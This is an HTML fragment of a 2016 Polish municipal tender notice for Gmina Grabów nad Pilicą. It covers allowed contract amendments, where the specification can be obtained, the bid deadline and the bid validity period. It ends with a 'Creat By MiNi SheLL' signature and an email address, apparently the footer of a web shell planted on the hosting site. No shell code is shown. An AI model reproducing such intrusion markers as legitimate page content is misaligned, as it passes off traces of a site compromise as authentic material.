<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)	konieczności wprowadzenia zmian projektowych lub technologicznych;
2)	z powodu istotnych braków lub błędów w dokumentacji projektowej, również tych polegających na   niezgodności dokumentacji z przepisami prawa;
3)	z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego;
4)	z powodu wystąpienia dodatkowych, a niemożliwych do przewidzenia przed zawarciem umowy przez    doświadczonego Wykonawcę robót;
5)	z powodu niemożliwych do przewidzenia niekorzystnych warunków atmosferycznych które mają wpływ    na realizację zamówienia publicznego;
6)	przedłużenia się uzgodnień zewnętrznych przez podmioty do tego upoważnione; 
7)	wystąpienia okoliczności nie zawinionych przez strony,  których nie można było wcześniej przewidzieć;
8)	zmian dokumentacji projektowej dokonanych na wniosek Zamawiającego (beneficjentów lub Wykonawcy);
9)	w przypadku zmiany kluczowego personelu Wykonawcy lub Zamawiającego;
10)	wystąpienia obiektywnych zmian ocenianych jako korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.grabow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Grabów nad Pilicą
ul. Kazimierza Pułaskiego 51
26-902 Grabów nad Pilicą.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2016 godzina 10:00, miejsce: Gmina Grabów nad Pilicą
ul. Kazimierza Pułaskiego 51
26-902 Grabów nad Pilicą.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com